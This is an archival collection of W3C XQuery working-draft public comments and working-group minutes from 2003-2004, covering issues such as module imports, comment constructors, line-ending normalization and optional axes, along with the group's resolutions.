3: for $i in $this return for $i in $that($i) return $i 4: for $i in $this return for $i in $that return $i Looking at "The scope of a variable", Don deduced (1) isn't an error. Agreement that (4) is legal. Agreement that (4) is the same as (1), although Michael Rys produced 5: for $i in $that return for $i in $this return $i and claimed that (1) mapped to both (4) and (5). Jonathan and MichaelR both wanted the introductory text in section 3.9 FLWOR Expressions under "The scope of a variable" should probably read "the lexical scope of a variable", and it would help if the example 1 was shown to be the same as 5, because the second $i occludes the first declarations. Don will try to clarify the document, although not necessarily adding this example. adopted. Section 2 Basics Technical For XPath 1.0 backwards compatibility, the string value of a node should be of type xdt:untypedAtomic. MR: For Query, want string() of a node always to return untypedAtomic. No support in the WG. Neither form of comment constructor gives any indication of what is to happen if (after atomization/casting) the string contains the sequence "--" or ends in "-" neither of which are allowed in an XML comment. 3.7.2 Other Direct Constructors 3.7.3.6 Computed Comment Constructors <!-- abc -- xyz --> comment { "-123-"} Both appear to be legal Xquery, but neither can directly result in an XML comment and the first can not result in an XPath/Xquery data model comment node: somewhat strangely only bans "--" but allows a trailing "-". By contrast, the xslt2 draft says, [ERR XT0950] It is a recoverable dynamic error if the result of evaluating the content of the xsl:comment contains the string -- or ends with -. The optional recovery action is to insert a space after any occurrence of - that is followed by another - or that ends the comment. 
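A direct XQuery rendering of that check might look like the following (a sketch; $content is assumed to be the already-computed string content of the comment):

    comment {
      if (contains($content, "--") or ends-with($content, "-"))
      then error()  (: or repair the string before constructing the comment :)
      else $content
    }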
David

See [448]. duplicate of qt-2004Feb0636-01, -- in comments. RESOLUTION: closed

Do we want this to be an error, or do we follow XSLT2, which makes this recoverable? [people agree to go the XSLT2 way, making this recoverable] Don will fix this, and PaulC will reply to this public comment.

I am having trouble understanding the meaning of the validation context which may be specified in a validate expression (and equally, the implicit validation context used when validating element constructors). This seems to be specified largely by example. One of the examples is: Suppose that $x is bound to a shipTo element. Then validate strict context po:purchaseOrder {$x} validates the value of $x in strict mode, in the context of the top-level element declaration po:purchaseOrder. So what happens if the element declaration po:purchaseOrder has the content model: <xs:sequence> <xs:any </xs:sequence> Is the shipTo element valid here? I would hope that it is, because the schema says it is allowed as a child of purchaseOrder, and it seems wrong that we should be able to create a structure that fails validation even though it conforms to the schema. But the specification suggests otherwise: "strict requires that each element to be validated must be present in the in-scope element declarations,...". So, perhaps there is a global element declaration for shipTo. Does this affect the outcome? Am I allowed to use the global element declaration, even though the context path for validation specifies some local declaration? It would be very strange if this were the case, but that's what the text seems to suggest. But now read it again. The "in-scope element declarations" does not contain elements, it contains element declarations. What does it mean for "the element to be validated" to be "present in the in-scope element declarations"? Section 2.1.1.1 says "Each element declaration is identified either by a QName (for a top-level element declaration) or by an implementation-dependent element identifier (for a local element declaration)". But the section on validation seems to be assuming otherwise: it seems to assume that an element declaration is identified not by a QName, but by some kind of path. Of course an element declaration that's contained in a group, or that's referred to by an <xs:element can be reached by many different paths (an infinite number of paths). Are these paths allowed to contain wildcards or not? I'll stop there. Perhaps this is all clarified in the formal semantics? XSLT 2.0, incidentally, avoids these problems. It does not allow validation against anything other than a global element declaration or a global type. Michael Kay

On an internal list, I raised the following comment: <quote> In section 4.2 of the XQuery language book we say: The names of all variables and functions declared in a library module must be explicitly qualified by the target namespace prefix.[err:XQ0048] This must be the only place we mandate the use of a specific prefix, as distinct from a specific URI. Was it intentional? It seems very much contrary to the intent of QNames and namespaces.
I suggest that this should say: "The name of every variable and function declared in a library module must have a namespace URI that is the same as the target namespace.[err:XQ0048]" Practical use case: you might want to cut and paste a set of functions from one module into another. Rather than changing the old prefix everywhere it appears, you would expect to be able to declare the old prefix to map onto the new URI. </quote> The WG discussed this comment at a telcon on 2003-12-17 and agreed with the suggested text. To ensure public visibility, I was given the action (XQUERY-162-05) to raise this as a public comment. Michael Kay On an internal list, I raised the following comment: "There appears to be no explicit rule stating that the module namespace of an imported module must differ from the module namespace of the importing module. Clearly such a rule was intended." The Query WG discussed this on 2003-12-17, and agreed the change in principle; to ensure public visibility I was given the action (XQUERY-162-04) to raise the matter on the public comments list. More recently, Per Bothner has raised the same question in a rather more generalized form: See Last Call issue reference qt-2003Dec0288-01 The WG discussed Per's comment at a telcon on 2004-01-14 and scheduled further discussion at the face-to-face next week. I imagine this discussion is likely to revisit the 2003-12-17 decision. Michael Kay c) [XQuery] Uniqueness of module namespaces, Michael Kay Status: We need to finalize our position since MK implies that we might re-consider our position. In the second part of the text, referring to Per's comment, MikeK seems to imply that we might change our mind. So, PaulC will send a message that we will not revisit this issue. Reading the working draft (W3C Working Draft 12 November 2003) and testing some XQuery tools left the impression that the axis features are sort of neglected by leaving features optional, which is not acceptable. The introduction of the Full Axis Feature (section 2.6.3) open a way for implementers to claim XQuery conformity without supporting certain axis such as the sibling and ancestor axes. These might not be relevant in unordered databases such as address tables, where sorting takes place, if required, after querying; but XML data provides an essential component namely the preservation of the order. Annotation formats for speech for example rely on rather flat XML trees that maintain the linear order of speech. These annotations clearly show a data centered approach to XML, which makes it a candidate for processing with XQuery rather then XSLT. But querying such data is interesting if access not to the whole subtree but to a context is possible. The same is true for flat structured textual documents where distributional analysis of texts are required and wanted. Accessing the linear structure of XML documents is a major advantage of XML based databases for certain applications and clearly distinguishes these DBs from relational data where these access structures are not to be maintained. Especially for the processing of natural language, in data or document based XML, the full set of axis needs to be available. I would strongly recommend the change of the following: 1. Section 3.2.1 OLD sentence: XQuery supports the following axes (subject to limitations as described in 2.6.3 Full Axis Feature): <bulletlist> NEW sentence: XQuery supports the following axes: <bulletlist> 2. Section 2.6.3 needs to be deleted. 
Vendors will provide their personal flavors of XQuery, whether the feature is in the specification or not. But at least they should not find an excuse for omitting certain axes that are justified. If necessary I can provide example queries which are needed in language databases. A workaround with user defined functions (using features such as the node number or position) or more complex constructs is not acceptable, as it seems to violate the principles of navigation in XML trees. Missing features like this would doom XQuery to failure in large and growing XML-using communities. Thorsten -- Thorsten Trippel, Computational Linguistics and Spoken Language, Bielefeld University

PaulC will reply to this, along the same lines as the David Carlisle comment.

I asked this before, but even the latest drafts don't seem to have a clear answer for whether there can be multiple library modules with the same namespace. Assume mod1.xql:

    module namespace m = "M";
    declare function m:f() { 1 }

and mod2.xql:

    module namespace m = "M";
    declare function m:g() { 2 }

Is the following main module allowed?

    import module namespace m1 = "M" at "mod1.xql";
    import module namespace m2 = "M" at "mod2.xql";
    m1:f()+m2:g()

How about this?

    import module namespace m = "M";
    m:f()+m:g()

The statement in 4.7 that "The module import identifies the module to be imported by its target namespace" implies neither are allowed because in this case you cannot identify the module by its target namespace. But the phrasing is sufficiently imprecise that I can't be sure what's intended. It would be nice to clarify this, either: A. The target namespace must match a single library module; it is a static error if multiple modules have the same namespace. or: B. If multiple modules match the target namespace, then they are all imported. My assumption (and strong recommendation) is that A is intended. -- --Per Bothner per@bothner.com

> a) qt-2003Dec0288-01, multiple modules with same namespace
> Status: Deferred for further discussion at the XQuery F2F.

Rys: we already have constraints in the static context. We might need more. Don: we could choose the simplest approach here, which is option a), getting rid of the hint syntax. Jason/MaryH: we need this as a use case, when we split functions across more files during development. Dana: but you could use a URI resolver for that, much as happens in Java, binding the logical resource to the physical resources. Rys: the things Mary and Jason want are more pertinent to a Query System rather than to a Query Language. Questions: Q1: can you have more than one ModuleImport for the same target namespace? (Per's question) [no; if you want more than one location hint, use the facility to have multiple location hints] Q1a: can you have more than one ModuleImport for the same target namespace with different locations? [no] Q2: can the namespace prefix which is assigned to URI1 in one ModuleImport be the same as the namespace prefix which is assigned to URI2 in a second ModuleImport? It should be no, but do we allow this now?
Rys: We have a constraint that a Prefix must be bound to a single namespace Andrew: error XQ0033 might apply here Q3a: should we consider changing the syntax to permit multiple location hints (instead of just one) (in order to prohibit multiple ModuleImports for the same URI) [acceptable to many wg member] [and if so, we should do it for schemas too] Q3a': if we accept this should we do this for Schemas as well (for symmetry)? Q3b: should we consider dropping the location hint completely leaving the resolution of locations up to the URI resolver)? [two people in favour: Rys, Dana] So, Per's example: import module namespace m1 = "M" at "mod1.xql"; import module namespace m2 = "M" at "mod2.xql"; m1:f()+m2:g() could be written for instance as import module namespace m1 = "M" at "mod1.xql", "mod2.xql"; m1:f()+m1:g() *** * ACTION A-TAMPA-08 * on Don * to implement the resolution to * qt-2003Dec0288-01, multiple modules with same namespace, * and to reply to Per's public comment * (cf. ) *** Hints to Don for implementations of this proposal to add multiple location hints and to to prohibit multiple imports: a) Consider using text for success/failure of SchemaImport for ModuleImport b) multiple location hints should be comma separated c) consider errors if moduleImport causes function/variables/etc to be duplicated from multiple location hints d) do we raise an error if a ModuleImport causesw functions, variables etc to be duplicated form more than one location hints ---- Related question on modules by Don and IBM developers: If a module imports something (say a schema) that defines some type, and a query imports than module, I don't get eg the schemas that the module imports, but the functions. So I have to know the schemas, and explicitly import themselves. So, if I import a function that imports some type, why those types aren't imported too..? My IBM colleagues think this is broken. [people can't recollect] [so, Don will file in a Last Call comment by IBM] I would like to enter this as a last call comment from DataDirect. Jonathan > From: "Peter Coppens" <pgp.coppens@pandora.be> >To: <www-ql@w3.org> >Date: Fri, 19 Dec 2003 16:36:44 +0100 >Subject: Precedence rules for QuantifiedExpr - OrExpr - AndExpr >X-Mailing-List: <www-ql@w3.org> archive/latest/701 >X-Loop: www-ql@w3.org >Sender: www-ql-request@w3.org > >All, > >Looking at the XQuery spec, I am somewhat surprised by the consequences of >the precedence rules for QuantifiedExpr - OrExpr and AndExpr > >What I mean is: > >Take the query > >for $x in (1,2,3) >where > some $y in (1,2) satisfies 1 = $y and $y = 1 >return $x > >Which, I think, is equivalent to > >for $x in (1,2,3) >where > some $y in (1,2) satisfies (1 = $y and $y = 1) >return $x > >But now take the query > >for $x in (1,2,3) >where > some $y in (1,2) satisfies 1 = $y or $y = 1 >return $x > > >Which, I think, is equivalent to > >for $x in (1,2,3) >where > (some $y in (1,2) satisfies 1 = $y) or $y = 1 >return $x > >I find that rather confusing. > >So I guess I have the following questions > >(1) is the above interpretation correct? >(2) is this a deliberate choice and if yes, are there any motivations for >that decision that can be shared? >(3) would it not be possible to add an extra level of precendence where the >OrExpr comes to sit between QuantifiedExpr and AndExpr, or would that >propagate to have other side effects? > >Thanks, > >Peter > I was rather surprised by this comment, but looking at the way the spec is > written, I can see how you came to this conclusion. 
So you see the issue being that "or" is at the same level as FLWORExpr, some, every, TypeswitchExpr, and IfExpr "Precedence Order" table? > I'm pretty sure the > intent was that > > some x in y satisfies a or b > > should parse as > > some x in y satisfies (a or b) Yep. As extra enforcement to this fact, here is the diagnositic results from the test parser. some $x in y satisfies a or b |QueryList | Module | MainModule | Prolog | QueryBody | Expr | QuantifiedExpr | Some some $ | VarName x | In in | PathExpr | StepExpr | NodeTest | NameTest | QName y | Satisfies satisfies | OrExpr or | PathExpr | StepExpr | NodeTest | NameTest | QName a | PathExpr | StepExpr | NodeTest | NameTest | QName b Quiz time: for $x in baz return $x or for $z in yada return $z What does this expression do, in terms of parsing? Answer: it is a syntax error. for $x in baz return for $z in yada return $z or $x What does this expression do, in terms of parsing? Answer: it parses just fine. This is a resolved issue, and I think is goodness, but is a little confusing when looking at precedence issues. -scott Proposal accepted. > c) qt-2003Dec0264-01 : [XQuery] Precedence rules for QuantifiedExpr - > OrExpr - AndExpr > > sues.html#qt-2003Dec0264-01 > > Status: This item is classified incorrectly, it should be Joint, as it > relates to XPath. Deferred to joint F2F (XPath) meeting. Done as well. SAG-XQ-004 Unordered We find that the concept of unordered() as a function, while it has some theoretical justification, is very difficult to explain to users. This is because it doesn't reflect the intended purpose: people call functions when they want to perform some computation on a supplied value, not when they want to tell the compiler to relax the rules on how the input is evaluated. The decision also seems to be inconsistent with the decision to merge "order by" into the FLWOR expression, rather than offering "sort" as a free-standing function/operator as was done previously. We propose that the functionality provided by the unordered() function be offered instead by custom syntax in the FLWOR expressions: essentially by a keyword UNORDERED which would be a syntactic alterative to the ORDER BY clause. Michael Kay for Software AG The current "unordered" is syntax now, not a function. SAG-XQ-003 Run-time access to static namespace context There are a very small number of constructs in the XQuery draft that require run-time knowledge of the static namespace context. We feel that these constructs are undesirable. (a) they create a dependency on the choice of prefixes that is not apparent to the casual reader of a query, leading possibly to failures if the prefixes are changed. (b) they create complexities for implementors and run-time overheads, especially for products that act as compilers rather than interpreters, because the amount of information that needs to be retained in the compiled code is greatly increased. (c) they offer no functionality that cannot be achieved in some other way, just as conveniently. The constructs that require access to the static namespace context are: - computed element and attribute constructors - casting string to QName (and perhaps NOTATION) (the latter also affects XPath) In computed element and attribute constructors, we allow the name of the element or attribute to be evaluated either as a value of type xs:QName, or as a string in the lexical form of a QName. 
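For reference, the two forms look roughly like this (a sketch; the element name and namespace URI are invented, and expanded-QName is the QName-constructing function referred to below, whose exact name and signature varied between drafts):

    element { expanded-QName("http://example.com/po", "lineItem") } { () }
    (: name supplied as a value of type xs:QName, built without using any
       namespace prefix :)

    element { "po:lineItem" } { () }
    (: name supplied as a string in QName lexical form; the prefix po must be
       resolvable from the static namespace context, which is the dependency
       under discussion :)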
The second option is useful only (a) where the desired name is in no namespace (and there is no default namespace), and (b) where the desired namespace URI is known statically, but the desired local name is computed. I think that we should retain the option to supply the value as a string, but in this case it must be in the form of an NCName, and the resulting node will be in no namespace. For the second case, it is just as easy to construct an xs:QName dynamically by calling the expanded-QName function. For casting a string to a QName, the cast can only succeed if the prefix is one that has been statically declared. In practice this means that the namespace URI must either be known in advance, or must be one of a small set of possible namespace URIs. This scenario is not especially plausible, and when it does occur, it is just as easy to use the expanded-QName function to construct the required QName. In fact the main use case for casting string to QName is where the string is supplied as a literal, for example in the constructor xs:QName("xs:integer"). This is needed for example in an argument of a function call where a value of type xs:QName is required. We could meet this use case either (a) by treating the xs:QName() constructor as a special case, and requiring the argument to be a string literal, or (b) by providing custom syntax for QName-literals. Michael Kay for Software AG.

SAG AG we CLOSED this at yesterday's distributed meeting, by adopting a zero-argument collection function

The semantics of computed namespace constructors is unclear: 3.7.3.7 Computed Namespace Constructors A constructed namespace node ... binds a namespace prefix (represented as NCName in the syntax) to a URI and adds the namespace prefix to the in-scope namespaces for its enclosing element. But the "in-scope namespaces" is part of the *static* context, and contains both prefixes *and* URIs: [Definition: In-scope namespaces. This is a set of (prefix, URI) pairs. The in-scope namespaces are used for resolving prefixes used in QNames within the expression.] So how can a run-time namespace expression add to the static in-scope namespaces? It might be possible to change the semantics so that only the namespace prefixes are part of the static context, while the namespace URIs are part of the dynamic context, but that would certainly complicate implementation and probably the semantics. Consider:

    element {$ename} {
      namespace xx { myns:f($myns:x) },
      namespace myns {if $version eq 1 then "" else ""},
      attribute xx:type {"myns:invoice"},
      $content
    }

This has a forward reference to the myns namespace (is that allowed?), and a function name, a variable name, and an attribute name, all of whose namespaces have to be calculated at run-time. I assume the intention is to not allow that. I suggest a separate concept of "active namespaces" consisting of namespaces declared in namespace attributes and namespace constructors. This could be part of the dynamic environment, but not the static environment. -- --Per Bothner per@bothner.com

we've renovated this part of the document and invited the author of the public comment to look at a future WD to confirm that the semantics is clear

There do not appear to be any rules saying that line endings in XQuery text are normalized. This means that the query: <a> gotcha!
</a> will return a different infoset depending on how the text editor used to prepare the query represents line endings, and it will potentially produce a different infoset from the one produced by an XML parser when applied to the same input. I would recommend that line endings within XQuery input text should be normalized in the same way as XML line endings. And to avoid having to change the rules in the future, I would suggest that we use the XML 1.1 rules rather than the XML 1.0 rules. This rule should not apply to XPath; preprocessing of XPath input is the job of the host language. Michael Kay Software AG JR: Do end-of-lines in query get converted to single character as per XML rules? If not, impedes testing. In addition, given that direct constructors look like XML, it would be confusing to have them behave differently. Q: What about such characters in a quoted string? A: That's a quoted string, that's different. If extracted into XML content, then it happens. Q: More specifically, string with CRLF and use that to construct element content? A: When element content gets CRLF it gets converted to new character. MK: No, don't think that's right, I think "behaving like XML" means all CRLF gets normalized as first stage. If you want a CR character you use entity reference. XML does more than normalize element content, also does it to attribute values. MR: No problem with doing that in XML construction, but have a problem of doing that to string literals. That is, if I use existing XML syntax to do XML construction use the XML rules, but if use XQuery functions or value retrieved from DM instance, then shouldn't happen. MK: Not suggesting changing data model values. So: <foo bar=" attrvalue"> <bar /> </foo> would get normalized What about: <foo bar="{ attrvalue}"> <bar /> </foo> Yes: because you get attribute value normalization. AE: Considers this surprising. MK: Considers not doing it surprising. JR: Considers it inappropriate to make results of XQuery OS-dependent. MK: Not also if have CR in there inadvertently, then serializer will have to output that as #xD, which gets messy. Should have to work quite hard to get a CR into your results. MR: If you are concerned about portability, use entity references. MH: Two sets of rules would be confusing. Often flip back from literal element construction to using functions and variables in course of development. Gets confusing to change results. DC: So XML elements vs "inside the curly brace" are the two contexts? Yes. Don't have strong opinion, but see them as sufficiently different to motivate treating them differently. JR: Why would I ever want to get different behaviour on different OSes? MR: Simple. Strings should be looked as from the POV of data model instances and therefore should not be messed with. Similar rules for whitespace. AE: Some languages, e.g. SQL, disallow end of line inside string literals to get away from this problem. JM: Sort of; SQL finesses the issue a bit. DC: What does serialization say? Do newlines get put out in OS conventions? MK: Serializer needs to preserve roundtripping. If you see CR serializer must emit as #xD, under assumption that was only way it got there and to preserve ther roundtripping. Case 1: element construction, do line-ending normalization as per JR's message which uses XML 1.1 rules MR: Wants to stick to XML 1.0 rules MK: Strongly in favour of XML 1.1 rules to prevent transition problems down the road. The rules: 1. the two-character sequence #xD #xA 2. the two-character sequence #xD #x85 3. 
the single character #x85 4. the single character #x2028 5. any #xD character that is not immediately followed by #xA or #x85. Items 1 and 5 are XML 1.0 rules. MR: Suggest we make it implementation-defined whether you do it as per 1.0 or 1.1, linked to existing implementation-defined decision about handling XML 1.0 or 1.1 DC: Why it is harmful for system implementing XML 1.0 to implement these rules? MR: Need to have different parsing. MK: Argument against #85 is that it means something in Windows proprietary charsets and people get them inadvertently into data when they think they are using ISO-8859-1. Don't think we should redebate pros and cons of XML 1.1 decisions here, however. MR: Disagree. We have already decided to give it an implementation option whether to support XML 1.0 or XML 1.1. MK: I think it is just sacrificing portability for no particular reason. AGREE: that XML 1.0/NS 1.0 vs XML 1.1/NS 1.1 should be a single choice across the document. AGREE: In direct element constructors, end-of-line normalization is performed, either using XML 1.0 or XML 1.1 rules, implementation-defined Case 2; string literals (inside curlies) * no normalization * normalize * ban end-of-lines in string literals DC: Asks for use case for NL in string literal JM: Have text that needs to be formatted exactly as is (e.g proglang code) and wish to express a value that has line endings in it. AGREE: Normalize line endings in source text of XQuery either using XML 1.0 or XML 1.1 rules, implementation-defined as per global switch Clarification: Not for pure XPath, a host language issue, this is just for XQuery. RESOLVED: by agreeing to normalize line endings in the source text of XQuery, using either the XML 1.0 rules or the XML 1.1 rules, the choice of which being implementation-defined per a global switch that selects either XML 1.0/XMLNS 1.0 rules or XML 1.1/XMLNS 1.1 rules. In section 2.4.3, the XQuery language draft says: "It is a static error [err:XP0008] to use an ElementName in an ElementTest if that name is not found in the in-scope element definitions unless a TypeNameOrWildcard is specified." and "It is a static error [err:XP0008] to use an AttributeName in an AttributeTest if that name is not found in the in-scope attribute definitions unless a TypeNameOrWildcard is specified." But the error description for XP0008 reads: "It is a static error if an expression refers to a type name, function name, namespace prefix, or variable name that is not defined in the static context." which does not cover element or attribute names. It seems to me that a new error should be created for these 2 cases. Thanks, Priscilla Don: these two cases have been added ot the (now non-normative) list in the January draft. ACTION A-164-02: qt-2003Nov0249-01 [XQuery] use of XP0008 for element/attribute names Carmelo to respond positively, he's correct, and we're going to change the XQuery document so that it's covered. What is the rationale for the full axis feature? Having these things optional greatly harms interoperability between Xquery systems and between Xquery and Xpath. It would be understandable if it were (say) all the reverse axes that were optional as there are issues supporting those axes in a streaming manner, but since parent:: and << are both non-optional these axes can be supported by an entirely syntactic re-write. 
Forcing the users to do that is a pain, and one would assume that it is much easier for a system to spot and optimise a specific syntax such as following-sibling::foo than the equivalent expression let $here := . return ../foo[$here << .] I would strongly urge that this feature be dropped and that support for the axes be mandatory. David
Rys: we should keep the status quo, as the extra axes have problems wrt static type inference. Also, some implementation problems (e.g. for streaming or views).
PaulC: initially we made this optional as the WG didn't have a large enough consensus.
Pat: these axes are of use in the document community, like book authors.
Jason: yes, lots of use cases, e.g. you have a paragraph and want to cite the whole context (pre and post paragraph). Or, a chapter and you want to get its title.
Rys: but that is a minority of use cases; the truth is that these axes are very problematic for typing.
Dana: but we can already simulate these axes, so what's the point?
Massimo: yes; and the major problem here is interoperability: if these axes are bad, let's put them out; if they are good because some people use them, let's make them mandatory. As it is now we stay in the middle of the road, with no good reasons.
Steve: another possible way is to remove parent and root too. This would help provide a rational solution. Massimo: yes, that would at least be a rational position... JimM: yes, that would be very helpful for streaming.
Votes (only one preference): status quo: 6; all mandatory: 4; move parent and root to being optional: 4.
Votes (multiple preferences possible): status quo: 8; all mandatory: 7; move parent: 7. Can live with status quo: 9; can't live: 1; abstain: 4.
So, status quo prevails.

"3.7.3.1 Computed Element Constructors" In the part that describes the processing of the content expression, I think it doesn't say exactly what happens if the "adjacent sequence of one or more atomic values" consists of just the empty string. In that case you clearly cannot create a text node, but is an error raised or are such atomic values simply removed? And if they are removed, does that happen before or after the concatenation with intermediate spaces? Kind regards, -- Jan Hidders
> g) qt-2003Nov0194-01 : [XQuery] empty strings in content expressions
> sues.html#qt-2003Nov0194-01
> ACTION A-164-03: qt-2003Nov0194-01 : [XQuery] empty strings in content expressions
> Mike Kay to propose rewording of the paragraph "For each adjacent sequence of one or more atomic values", also handling the case text { "" }, so that a sole empty string isn't an error in an element constructor.
> DONE. See:
Rys: <tag>{'1','','2'}</tag> — does this give 1 _ 2 or 1 _ _ 2? (here, "_" is the blank). Jonathan: the single blank makes more sense to me. Rys: problems with the static rules and optimizations.
Rys: please see my comment in (Jan/0214), cf. issue MS-DM-LC2-066, where I give an alternate way to handle this, by adapting the data model (instead of the XQuery change), so that we won't need MikeK's fix text for this.
People note MikeK's text is correct, although redundant if we adopt Rys'. So, people approve MikeK's amendment.
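To make the question above concrete, here is a minimal illustrative sketch (not from the original thread); the spacing shown in the comments is exactly the open 1 _ 2 vs. 1 _ _ 2 question, not a settled answer:

    (: adjacent atomic values in a content expression are converted to strings
       and joined with separating blanks; the open question is whether the
       empty string in the middle contributes its own separator,
       i.e. <tag>1 2</tag> versus <tag>1  2</tag> :)
    <tag>{ '1', '', '2' }</tag>

    (: the sole-empty-string cases addressed by MikeK's rewording,
       so that they are not treated as errors in an element constructor :)
    <tag>{ "" }</tag>,
    text { "" }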
And, Srinivas will reply to this public comment. And, Michael Rys will further investigate shaping of his proposal wrt impact on the data model.

Why are the union, intersect, and except operations limited to working on sequences of nodes? It seems to me that they are perfectly well defined operations for sequences of arbitrary types, and that these three operators should be declared to work on sequences of item type. If there's no good reason for limiting them to node()*, I would ask that the signatures of these operators be revised to item()* instead. -- Elliotte Rusty Harold
Mike Kay: we decided the semantics of these operations on sets of atomic values were too different from the same operations on sets of nodes, and should be separate operators; we then decided that they were easy enough that F&O tells people how to implement them.
ACTION A-164-04: qt-2003Nov0188-01 : union, intersect, and except. Michael Kay to send a response to say that the WG reviewed the comment and we're not planning to make any changes.

Section 4.8 "Variable Declaration" of the XQuery November specification says that: A variable may appear in the expression part of a variable declaration only if that variable is declared or imported earlier in the Prolog than the declaration in which it is used. This is presumably to prevent indeterminacies and cycles. However, section 4.7 "Module Import" says that: Two modules may import each other. So is there anything to prohibit the following?
module namespace m1 = "M1"; import module namespace m2 = "M2"; declare variable $m1:v { $m2:v };
module namespace m2 = "M2"; import module namespace m1 = "M1"; declare variable $m2:v { $m1:v }
-- --Per Bothner per@bothner.com
Per Bothner asked about this in a public comment. This is pushback to Don's response to Per's qt-2003Nov0186-01. Don notes that there can be circularity involving separate compilation of modules, and raises an orthogonal item about this not being possible with a static error. Some discussion of this.
Andrew: we have two questions: do we have a valid definition of circularity, and do we need to tie it down further? Can we leave it loose?
Jonathan: I'd like to separate this from separate compilation. We don't talk about linking and module loading at all right now.
Don: I'm just saying we might not define any specifications that preclude separate compilation.
Mary H. and Jerome pointed out that we had more complex text before, from Paul Pederson, and it wasn't sufficient, so we deleted it.
Mary: I think the right way to proceed is to stick with what we have, and the only reason to get more specific is because we think implementors won't be able to make interoperable implementations, but I think in practice this won't be a problem. If difficulties arise, we'll know more clearly.
Straw poll: Want clearer definition of circularity: 0.5; Current document is OK: 5; Abstain: 3.
Jonathan drafted a response to Per and will send it; no changes to the documents.

Consider the following query: declare namespace}; declare variable $f {<f a="{$e/@a}" xmlns="M"/>}; <result> e: {$e} f: {$f} </result> The output I expect is: <result> e: <e xmlns: f: <f xmlns="M" a="mx"/> </result> Saxon 7.8 emits: <result> e: <e xmlns: f: <f xmlns="M" a=""/> </result> Kawa doesn't handle namespace declaration attributes, but it's next on my list of projects to tackle.
-- --Per Bothner per@bothner.com
> e) 2003Nov/0300 belated namespace declaration attributes
MikeK: Per is correct, and we should make that clear. Don: Yes, and that's what XML does, and there's no intention that our constructor syntax should diverge in any way from XML. AndrewE: see Namespace Declaration, 4.10.
*** ACTION A-TAMPA-20 on Jonathan Robie to respond to the public comment on belated namespace declaration attributes (), saying that we want to be the same as XML, and the order will not be made significant. ***

It seems for every direct constructor there is a computed constructor -- except for CDATA sections. Since the WG has allowed CDATA direct constructors at all, there should be full support including computed constructors. I can understand if the CDATA sections were only to ease creating/viewing files that would otherwise require many entities, but since they also may be serialized by implementors it is limiting not to have this functionality. Proposed rule: CompCdataConstructor ::= "cdata" "{" Expr? "}" --Sarah
Jonathan, This is quite satisfactory, thanks. --Sarah On Jan 21, 2004, at 2:04 PM, Jonathan Robie wrote: >
Mary: this text could be a bit more precise, and also say what happens e.g. when predefined entities are expanded. It'd be good if this boilerplate were the same for the language and formal semantics documents and for XSLT.
Rys: please see my text in
People agree that mixing Don's 042 message and Rys' 0052 (amendment to Don's point (3)) is the good way to go here. Don will take care of it. Jonathan will send a reply to this public comment. [approved]

[minor editorial] In section 1. Introduction, 2nd paragraph, we have: The Query Working Group has identified a requirement for both a human-readable query syntax and an XML-based query syntax. In fact the Requirements document does not talk about a "human-readable" syntax, and does not discuss a concept that the non-XML syntax is intended for human consumption and the XML syntax is intended only for machine use (not human readable). There are people who consider that at least some XML documents - for example, XSLT stylesheets - can be read by humans. I suggest using the terms "XML syntax" and "non-XML syntax". Thanks, Liam -- Liam Quin, W3C XML Activity Lead

7. Section B.2 Operator Mapping
There are a few typos in the Binary Operators table - xs:dateTime is named xs:datetime (lowercase t) in the following rows:
A + B | xs:datetime | xdt:yearMonthDuration | op:add-yearMonthDuration-to-dateTime(A, B) | xs:dateTime
A + B | xdt:yearMonthDuration | xs:datetime | op:add-yearMonthDuration-to-dateTime(B, A) | xs:dateTime
A + B | xs:datetime | xdt:dayTimeDuration | op:add-dayTimeDuration-to-dateTime(A, B) | xs:dateTime
A + B | xdt:dayTimeDuration | xs:datetime | op:add-dayTimeDuration-to-dateTime(B, A) | xs:dateTime
A - B | xs:datetime | xs:datetime | fn:subtract-dateTimes-yielding-dayTimeDuration(A, B) | xdt:dayTimeDuration
A - B | xs:datetime | xdt:yearMonthDuration | op:subtract-yearMonthDuration-from-dateTime(A, B) | xs:dateTime
A - B | xs:datetime | xdt:dayTimeDuration | op:subtract-dayTimeDuration-from-dateTime(A, B) | xs:dateTime

3. Section 3.7.3.1 Computed Element Constructors
The content expression of a computed element constructor is processed as follows: 1. For each node ... Any sequence of adjacent text nodes in the content sequence is merged into a single text node.
Suggest adding the phrase "by concatenating their contents, with no intervening blanks" to be precise, as bullet 4 in "3.7.1.3 Content".

2. Section 3.7.2 Other Direct Constructors
"A CDATA section constructor constructs a text node whose content is the same as the content of the constructor." Since the term "content of CDATA section constructor" was not defined, it seems better to use more precise wording: A CDATA section constructor constructs a text node whose content is the sequence of characters placed between the starting and ending delimiters of the CDATA section constructor.
Overtaken by events. CData section constructors no longer

1. Section 3.7.1 Direct Element Constructors
There is a seeming contradiction between definitions of "direct element constructor": If the name, attributes, and content of the element are all constants, the element constructor is based on standard XML notation and is called a direct element constructor. and later: In a direct element constructor, curly braces { } delimit enclosed expressions, distinguishing them from literal text. This contradiction could be remedied by modifying the first definition as: One form of a direct element constructor is where the name, attributes, and content are all constants in standard XML notation.

0. Section 3.5.3 Node comparison
4. A comparison with the << operator returns true if the first operand node precedes the second operand node in document order; otherwise it returns false. 5. A comparison with the >> operator returns true if the first operand node follows the second operand node in document order; otherwise it returns false. It seems better to use the more usual and neutral "left and right operands" instead of "first and second", since the natural order while reading is not always left-to-right.
I recommend rejection of this comment. This sentence is intended as an example of a possible error (dividing by zero). No value is added by referencing a specific error code or message. Adding cross-document references makes the documents fragile and subject to breakage as the target document is

8. Section 3.2.2 Predicates
A left-to-right order of applying predicates is not specified, but such an order is implied by samples and other definitions in the section. Explicit wording about the order of applying predicates would avoid misreading.
I recommend rejection of this comment. Text has been revised, and currently says "The value of the step consists of those items that satisfy the predicates." I do not see any value in constraining an implementation to evaluate the predicates from left to right. However, in partial response to this comment, I have inserted an example of a step with multiple predicates.

7. Missing anchors on error types (document wide)
A few instances referring to errors are missing anchors. To be consistent these should probably be fixed. 3.12.1 Instance Of: "dynamic error" in the last sentence isn't an anchor. 4.7 Module Import: "static error" in the first paragraph isn't an anchor. 4.8 Variable Declaration: "static error" in the first paragraph isn't an anchor. 4.8 Variable Declaration: "type error" in the second paragraph isn't an anchor.

6. Section 2.4.4 SequenceType Matching
In the definition of the function 'type-matches' it would be helpful to describe some reasons why derivation by extension for an unknown actual type is not treated by the spec as a basis for a positive result of type-matches(ET, AT). A brief description of the reason for the difference would be helpful. Requests a more detailed justification for the "winged horse" rules.
Why is derivation by restriction treated differently from extension? Status: No action taken. If the working group wants to add this material, I will need some help in preparing it. [closed with no action]

5. Section 2.4.4 SequenceType Matching
